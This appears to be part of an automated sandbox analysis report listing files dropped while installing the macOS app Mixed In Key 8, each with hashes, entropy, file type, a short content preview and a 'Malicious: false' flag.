Preview:	.PNG........IHDR.............Vu\.....pHYs................ cHRM..m...s........T..o.......0.....6P......IDATx.l.Af.A...OG.RB.Y.. ..!r..m..z..B..@..hW..'....9F7ob..f1........~./.p.>.l.L.Oq..?..>....!e..=..N.W.#....<..6:.B.R....R1.....2<.p-....}.WK.`..<...2.T.e./.z..R..`_.......*.,m.^....>.....Z4.N.V.....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_UoPZRW Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, UTF-8 Unicode text
Category:	dropped
Size (bytes):	1347
Entropy (8bit):	5.2196777127737395
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6NWC3tCMa69C42Rw0gp/sH2PgCGexwMZhGt0G+3:cfyfVtWC3tCc9CjO0giH2ICGcwcGt0GQ
MD5:	485D214151A592AABA7D3DEDF183525A
SHA1:	86B06AC35DEF369B69BA621BCB29E5B7E9F29B18
SHA-256:	43BF99C5807B6C2E944FC8EB9DF00625FD8B1C42A8AF05C11B260B33C8AC66F6
SHA-512:	4960B85A7478C96511B2F96E22DD6606A8AE693120CBAC2917DC21410D8689AA6803A7724633AF6BD3A3726E3F2FAD7EDAEBFCBE1B4E06048DFAD7FCF8EFE059
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>MIKToolkit</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKToolkit</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>MIKToolkit</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</k

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_cw58cq Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	9351
Entropy (8bit):	6.653442276295863
Encrypted:	false
SSDEEP:	192:GOw1WJi6VE0lAjeEYNMtKwtxEXlsWFfFS+x+W:SgJtVE0CeEYNg7txEXrFfFvX
MD5:	A8BAF74AB23EB40415F0F93B93CA0397
SHA1:	AD0BC52FB2962DCBB0484CF458D61E824E2B876F
SHA-256:	E12177BAAAF9E188F4B733498630A3EB8E0C40508F0B9356C11B1698E848B9C5
SHA-512:	BFAB720D1C2FB1BCA4A9B1464BD901826510301DB646721760DFE2EB8488C61CF2D093E8E9479F4B3C8A72A58FD76820ABD4816A75A466E28551192AD38D15FB
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top.......i.......#.$.*...2.;.C.U._.`.z.{......................................................................... .$.%.&.'.../.4.9.:.=.>.?.B.C.H.I.M.X.Y.Z.[._.j.k.l.m.t.u.v.y..............................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....W.U.Q.g...g.f.h.V.. ...!."[NSClassName...._..MIKSlideUpPanelViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9...../.A.D.I.3..<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F...G.H.I.J.K.L.M.N.O.P.P.R.S.TVNSCellWNSFrame_..NSAllowsLogicalLayoutDirection_..NSNextResponder[NSSuperviewXNSvFlags]NSNibTouchBarYNSEnabled.............!....... .V.G.I.J.W.X.Y.Z.S.\.S.^ZNSSubv

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_rVW1UK Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	7327
Entropy (8bit):	6.576807632328487
Encrypted:	false
SSDEEP:	96:Z1W+U8f8E0l632MVgjOza6MT0D5MdtbZPAVwzVr+mOED02Wd7g6Ye8:Z1Wn80E0l3jeEYNMtKwsmOW0X5LYB
MD5:	4491740B20199BC26AE73E8AEE2CCD93
SHA1:	8F870C1D949AB69CF0CB2410EBEB4B4EB5496243
SHA-256:	CA040FC4EF825F06127B5D8B1E1E14164EDC1FFF9C445A21E9E921ABF3DF4826
SHA-512:	0C0274A9860454660350B9290E5F191ECE2AFA96AD708272D3D7CA07142F822126E4A22223318581D883BE83F44703B25FBCC65DDFB6C25AA888D7336AAAE448
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top.......9.......#.$.*...2.7.?.S.\.].m.n.v.w.z.............................................................Q................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.......,.(.7...7.6.8.-.. ...!."[NSClassName...._..MIKTooltipPopoverViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.6..4.5...!.#..8.9.:.....<.=.>XNSSource]NSDestinationWNSLabel....... ..@.A.B...C.D.E.F.G.H.I.J.K.L.M.M.O.P.Q.RVNSCellWNSFrame_..NSAllowsLogicalLayoutDirection_..NSNextResponder[NSSuperviewXNSvFlags]NSNibTouchBar_.%NSTextFieldAlignmentRectInsetsVersionYNSEnabled....................... .T.C.E.F.U.V.W.X.P.O.P.[ZNSSubviews[NSFrameSize.&.%.".....$_..{{7, 10}, {426, 17}}..^._...`.a.b

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_5i6eGZ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	3825
Entropy (8bit):	6.522199258302331
Encrypted:	false
SSDEEP:	96:2qK1WhbFlExTJ9OStP/4a0MFZDlxZAJLSTVjcYfgwMvSnyj:7K1WhbrKJ9OS9WMnD9hANyO
MD5:	8F9EFD15096E154A25404BFA11F6FF1F
SHA1:	DD835EDA744960521E031FC543ACEDECA3E2E192
SHA-256:	DE27BBD2696A2C34EF24D93F2581B40F8AE0D56A30F41FEFDFE3CAF5D8C28BFE
SHA-512:	9C404ABF0097DFD0CA53DC8EAC09C28BE8019A4E8BF83DA8ED694A453CDB53EEE582FCAC8885CC6BF67825F9AAAEAB63B9165F5E736E16515AF85D6106799F0E
Malicious:	false
Preview:	bplist00..............I.JX$versionX$objectsY$archiverT$top.......W.......#.$.*...2.;.C.].e.x.y.z.{.\|.}.~.................................T.........................................................................).7.....8.9.:.;.<.=.>.?.@.C.FU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....H.F.B.U...U.T.V.G.. ...!."[NSClassName...._..MIKAboutBoxController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9...).:.<.>.@.1..<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel.....'.(..D.E.F.G.H...I.J.K.L.M.N.O.P.Q.R.S.T.U.P.W.X.W.Z.[.\YGroupName_..UseBackForwardList[Preferences]NSNextKeyViewZAllowsUndoYFrameName[NSSuperviewXNSvFlags_..NSNextResponder[NSFrameSize[NSDragTypes]NSNibTouchBar.........&.................L.^.M.O...

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_Cl6OO1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15884
Entropy (8bit):	6.769025090825442
Encrypted:	false
SSDEEP:	384:jgp3v17nDbou6rtfeEYNg7dVNYNg7XcsSh:jglseEYyVYyDs
MD5:	8855E6026F791F85C4F17B6B3A311501
SHA1:	FC0DF9C2B271E29BA712DD4139B2A1D3D0E805CB
SHA-256:	07E30860631B3E92D2F68B8FFEAEA48B9B9EDD060515142D53D5235B8B261B44
SHA-512:	1EB6945A4D7B4D84032633D477FBBD0891F07E24827D50472C76202AE81064971DE89FE87F077F95088691F9BCCE2B814AD54F232D4EC508CEEA43236D7DE6F8
Malicious:	false
Preview:	bplist00..............P.QX$versionX$objectsY$archiverT$top.......x.......#.$.*./.Q.R.S.T.U.a.e...................................................'.-.0.8...9.B.C.D.K.S.W.[._.d.e.j.o.p.z.{.\|...........................................................................................(.5.L.+...B.?.C.D.E.F.G.J.MU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys...b.k.i.f.v...v.u.w.j.. ...!."[NSClassName...._. MIKCopyrightInfoWindowController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,..ZNS.objects..-...a....0.1.2.3.4.5.6.7.8.9...:.;.<.=.>.?.@.A.B.C.D.E.F.G.G.I.J.K.L.M.N.A.P\NSWindowRect_..NSUserInterfaceItemIdentifier]NSWindowTitleYNSMaxSize\NSWindowViewYNSMinSize_..NSWindowIsRestorable_..NSMinFullScreenContentSize_..NSMaxFullScreenContentSize\NSScreenRect_..NSWindowContentMinSize_..NSWind

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_F9I9ro Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text
Category:	dropped
Size (bytes):	92
Entropy (8bit):	3.2610300066712608
Encrypted:	false
SSDEEP:	3:Qwh+yEilSlJlqXMLLkFlVlRDBWjUoFY9n:QpXioJqcLwVlRNWwou9n
MD5:	51EF59B60E5B41B91519CC662A9FE886
SHA1:	3222CA0C39EB50AAF8126BAF852E55430C4718AF
SHA-256:	39CF2EE07B7B333E7C179D0BF4D798A5B72AF6A4E584F51E642703BBFA4FC828
SHA-512:	3952A908B72D44040F5072F6344F6327FC78981C3AA55E931ACAE84C0C9BCC0D148991CD564AF4803765C328CBF5F7EFE9EB558FC56E47E8206B7B706026F30A
Malicious:	false
Preview:	../.. .L.o.c.a.l.i.z.e.d. .v.e.r.s.i.o.n.s. .o.f. .I.n.f.o...p.l.i.s.t. .k.e.y.s. ../.....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_aOps7J Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11964
Entropy (8bit):	6.767832090877087
Encrypted:	false
SSDEEP:	192:KGl1WtKP9OS9WMnF/MxeCE0l0bojeEYNMtKwgO4lVRKV4K2UTDDCIcKoF:KQgtm9JtF/MxeCE0i4eEYNg7gO4lVoVM
MD5:	393749545737C09D7FE6831F9CFD7E16
SHA1:	1AE362BC643BDE40F86B2123AAFEBF97A6D202F5
SHA-256:	E9D1037A92B0504A63DA681ADDB56D51EE81CA768D8D561A2AD204C6E98A172E
SHA-512:	9E7D343B26C93F3B9CF221FBC2C7C4CAD4166372FE092412A5DBF5CF9D7185D63F1883069F8B10165AE7D5E905F23E7B9AAE21543609EB56BF6C003932B6A623
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$....2.=.E._.h.{.\|.}.~.......................................................S.......................................)..2.3.6.9.:.;.@.D.O.R.S.[.\.].p.s.t.u.}.~....................................................................................... .!.#.'.../.0.1.?.B.C.E.S.j.....j........................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName...._..MIKEULAController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...3.s.u.w.z.{...;..>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....1.2..F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.V.W.X.R.Z.[.Z.].^YGroupName_..UseBackForwardList[

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_k4X6fk Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	3778
Entropy (8bit):	6.510856256363383
Encrypted:	false
SSDEEP:	96:dv1WvdlExTNG9OStP/4a0MFZf3WZ0jELOS9r7hTBtssYCT:dv1WvDKNG9OS9WMnf2eKndYCT
MD5:	DFB525048800D0CF8DA6C274A5AE83BA
SHA1:	F3C29B822132B63094E24438B34FE390E535E19B
SHA-256:	438B1FFD3C21D573F1481A67353A5ECFB5895965665C49C86905658E6A7FA535
SHA-512:	9A305637127AEBE73EA9F0B09F6567024B61C71A46433E6180269662F45759C55FF428630D5EC7DF2796E1207ECE0338354BF96500310BDA309BEF89D54EDCF4
Malicious:	false
Preview:	bplist00..............@.AX$versionX$objectsY$archiverT$top.......T.......#.$.*...2.:.B.\.d.w.x.y.z.{.\|.}.~...............................P.....................................................................!...../.0.1.2.3.4.5.6.7.:.=U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....F.D.@.R...R.Q.S.E.. ...!."[NSClassName...._..MIKNewsWindowController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.9..4.5.6.7.8...).:.<.>.0..;.<.=.....?.@.AXNSSource]NSDestinationWNSLabel.....'.(..C.D.E.F.G...H.I.J.K.L.M.N.O.P.Q.R.S.T.O.V.W.V.Y.Z.[YGroupName_..UseBackForwardList[Preferences]NSNextKeyViewZAllowsUndoYFrameName[NSSuperviewXNSvFlags_..NSNextResponder[NSFrameSize[NSDragTypes]NSNibTouchBar.........&.................K.].L.N...J.[._.`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_kXWjvw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	22210
Entropy (8bit):	6.932573380579771
Encrypted:	false
SSDEEP:	384:+xsgnVwiE0VeEYNg7Z92/5OyqH3M4IHkYNg7JYc/YQveNTUEK:3gn/eEYyswywfYylDRet2
MD5:	82D6CB606D6B8E63CA394511620AEAF2
SHA1:	030E149CC9B0ABD9022D82B1446792D4D2DBBF2E
SHA-256:	E40B0D41B44C248E34649615040F71FB036279CD6775F5196C066FE7A2D763E7
SHA-512:	611F297888F04D2B02CD5E49F186A19A32E799A6FCABDBABF08F75A7896C6BF6D2D82DA0C93AAA276ABABF4998CD4BC167F1C6679F02F4F2A23766E0794D3DF1
Malicious:	false
Preview:	bplist00..............A.BX$versionX$objectsY$archiverT$top........:.......#.$....2.I.Q.o.p.q.r.~...........................................................#.+./.3.7.:.?.@.E.H.N.X.Y.f.g.l.m.r.w.x...................................................................................8.>.P.T.d.e.q.{................................................................................. .#./.0.1.5.>.?.D.F.I.J.L.M.N.O.R.S.W.\.].b.c.h.i.n.s.x.}.~.......................f.............................................................................!.%.)..+.7.8.9.:.;.<.C.D.E.F.M.N.O.P.X.Y.Z.`.a.b...........j.n............................................. .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.;.>U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys...............8....8..7..9..... ...!."[NSClassName...._..MIKFeedback

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_uYw3d5 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	6612
Entropy (8bit):	6.631064723712792
Encrypted:	false
SSDEEP:	192:gsH1WQ5ZSN9xKQtOS9WMnm7GJw+lrmCkVEQK5:gsHgTN9xxtJtm7GJwFC935
MD5:	CA2B238591127F45F847D580D2028DF6
SHA1:	7A5ACBE18BFDF2C3D7009D5274FF71400853C3FC
SHA-256:	B73F880204C719F805FABC706F5F144240A422B2E2BCCFC00C87F83678400F73
SHA-512:	1668D296085EFFEAB653B312BDE63BA180145C99B9593645AC3C16D8D8D75B03E6204EAC1130F861EFEFC2332EE47784128B93C35291BBFB41206B5E54659082
Malicious:	false
Preview:	bplist00..............S.TX$versionX$objectsY$archiverT$top...............#.$.*...2.A.I.[.d.e...............................................................................................$.%.&.'.T.).-.1.4.5.:.\.].^._.f.q.t.u.}.~...................................................................................5.W.6.7.8.9.:.;.<.=.>.?.@.A.[.B.C.D.E.F.G.H.I.J.M.PU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....y.w.s...........x.. ...!."[NSClassName...._.%MIKPublicationServiceWindowController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.@..4.5.6.7.8.9.:.;.<.=.>.?.....$.E.X.Z.\._.a.c.h.o....B.C.D.....F.G.HXNSSource]NSDestinationWNSLabel..........J.K.L...M.N.O.P.Q.R.S.T.U.V.V.X.Y.ZVNSCellWNSFrame_..NSAllowsLogicalLayoutDirecti

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/_CodeSignature/.BC.T_CLuZtV Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	6479
Entropy (8bit):	5.15373872982817
Encrypted:	false
SSDEEP:	96:CyWK6MMNCv9jQc8itPfF/EOLNvvKsZD9U9cTaitPSkYT2BLDzFNQpO/YTbJvy:XyKnsoK7iZkEDzko
MD5:	722AD93CF53ED2BFAB0E8021ED97815C
SHA1:	4E0FC37221EB73DE288F64AF5FA1A16DBCCB3EAE
SHA-256:	1B1B48D32039690B562477261064B34A903E722D8A57D0C27C8BADEE00BF5AC5
SHA-512:	1B0FB100A21D9B0C6F1EBC0BC4CA7624227DE113509F41BE12DC2A6BE55180E73A187A85F94D240FDB20409CED296740FBEFA6FA400A705929AC8C8FFCA54DC3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...hrBqw13vNptpumIbyynlt+nymxg=...</data>...<key>Resources/SlideUpPanel.nib</key>...<data>...rQvFL7KWLcuwSEz0WNYegk4rh28=...</data>...<key>Resources/TooltipPopoverView.nib</key>...<data>...j4cMHZSatpzwyyQQ6+tLTrVJYkM=...</data>...<key>Resources/XButton.png</key>...<data>...+R39njQmRAoyJ8ud/R92NnKXkoU=...</data>...<key>Resources/en.lproj/About.nib</key>...<dict>....<key>hash</key>....<data>....3YNe2nRJYFIeAx/FQ6zt7KPi4ZI=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/en.lproj/CopyrightInformation.nib</key>...<dict>....<key>hash</key>....<data>..../A35wrJx4punEt1BObKh09DoBcs=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/en.lproj/EULA.nib</key>...<dict>....<key>hash</key>....<data>....GuNivGQ73kD4ayEjq

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/.BC.T_Sj0766 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS>
Category:	dropped
Size (bytes):	74016
Entropy (8bit):	4.873539994633014
Encrypted:	false
SSDEEP:	768:A73au8koS1V5oGlVw7firmOst+5OtxJGPJKHzQc9qg8:xuWS1V5xjPK7txJGPJKHJj
MD5:	30C88DC101BB17553462F59F24664D3E
SHA1:	4B0FB332D7D26A60487D5219C95A6199FF0EC29F
SHA-256:	6F172F4786E90F6B316D1224BA83208CFFC048F7CF057ED02209B0FC6FA21E72
SHA-512:	0EEA0404730064D4115ABE180BEDE858E29EB2817C4ADFEC768F5D63D66D061882451FF9C1EDF9AC9BF3078519F8F99A83DC40F0AD11121196F8151A72497DC2
Malicious:	false
Preview:	....................................h...__TEXT...................p...............p......................__text..........__TEXT................../7......................................__stubs.........__TEXT...........H......V........H..............................__stub_helper...__TEXT..........`I......J.......`I..............................__cstring.......__TEXT...........K...............K..............................__objc_methname.__TEXT...........S...............S..............................__objc_classname__TEXT.........._\......l......._\..............................__objc_methtype.__TEXT...........\...............\..............................__const.........__TEXT...........]......@........]..............................__unwind_info...__TEXT...........]......$........]..............................__eh_frame......__TEXT...........^...............^......................................__DATA...........p....... .......p....... ......................__nl_symbol_ptr.__DATA..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/.BC.T_bIODiK Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS>
Category:	dropped
Size (bytes):	284336
Entropy (8bit):	5.832940969122625
Encrypted:	false
SSDEEP:	3072:Pp2rnywXXDaOAmyCWeiRiEe7ztR24uLJ73R5Irx/yD0KfPMH26w6hrjk1YL2:4yIATw7RR24uN73R5Ie
MD5:	09F3A09E337714AD2FD5ACB807977841
SHA1:	00273BC0D823B5BF8E42B25F98E293A16C84C729
SHA-256:	9ACE1B161700F7A7ED5FC4DF15C35121616B77DE28C59C1902FD1A847C00373D
SHA-512:	439C5B695CA488116687591DC28350835ADFCA7986B3A579449EF9DA6CE69077F140EDB39DBD482BF8F0CAFCB54B744FD7D26554C4298346DE0F4D3FF8B7CA1D
Malicious:	false
Preview:	....................H...................__TEXT...................P...............P......................__text..........__TEXT..........\........^......\...............................__stubs.........__TEXT..........\r......2.......\r..............................__stub_helper...__TEXT...........v...............v..............................__cstring.......__TEXT...........}......@,.......}..............................__const.........__TEXT.................P......................................__gcc_except_tab__TEXT..........0...............0...............................__objc_methname.__TEXT..........L.......];......L...............................__objc_classname__TEXT..................`.......................................__objc_methtype.__TEXT..........................................................__unwind_info...__TEXT..........8.......@.......8...............................__eh_frame......__TEXT..........x........R......x...................................8...__DATA..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_6kMUxA Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	2530
Entropy (8bit):	5.198727465723452
Encrypted:	false
SSDEEP:	48:c8JplPvEDvQHcs5ITc3omFdVgMbOOrYJArYJlin432spR32s3Mtm13TGJHC:vPsbQHnoLTOrYJArYJlD3f3zXqJi
MD5:	A95B27511029996D8C4A9CE01D2456CD
SHA1:	9FCF1E59531915A00BBB40989EB1B14CDA29F84F
SHA-256:	39CB8874DB1D2B98F1021490C84DE220F11FFDF7834A9E2C8AFF6DBC26BB655D
SHA-512:	03A2E0FF1C46CBCF6D1336F39F01E43527271C7C17A7DA4F5765E523764B2A3946A9A4879A420904EFF397F3D495F3270424EBB36F16D13A2CC4F453D4ACF0DA
Malicious:	false
Preview:	Copyright (c) 2006 Andy Matuschak..Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH T

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_jsQrlm Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	6259
Entropy (8bit):	5.172431285417993
Encrypted:	false
SSDEEP:	96:Cyj0aw93HTCNSqDhwrPem2wyr5ZJCaCCQ4C0bC7HxkC6xk9wn2Nr/u+lY5+a8H7W:XwE1zC5CJCOCaZj6C/H
MD5:	7D0D84A1983ED9A191D00EDE11816E3D
SHA1:	BE86652139BA547D570BB6A66CFC8DF8056F3154
SHA-256:	A33594664708AF653B64E1F6AE47E5C67119898ADC258315AA9FB93B5837B882
